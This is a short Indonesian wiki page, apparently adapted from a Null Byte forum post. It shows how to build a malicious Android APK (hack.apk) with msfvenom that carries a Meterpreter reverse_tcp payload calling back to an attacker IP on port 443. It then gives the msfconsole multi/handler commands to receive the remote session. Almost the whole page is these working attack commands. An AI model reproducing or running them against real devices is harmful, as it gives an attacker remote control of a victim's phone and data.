MSF: Android/Meterpreter/reverse tcp APK dengan msfvenom

From OnnoWiki
Jump to navigation Jump to search

sumber: https://null-byte.wonderhowto.com/forum/create-and-use-android-meterpreter-reverse-tcp-apk-with-msfvenom-0162921/

Membuat apk dengan msfvenom

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.209 LPORT=443 > hack.apk

Asumsi

IP attacker (kali linux) 192.168.0.209
port attacker 443

Di sisi attacker / kali linux

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.0.209
set lport 443
exploit


Referensi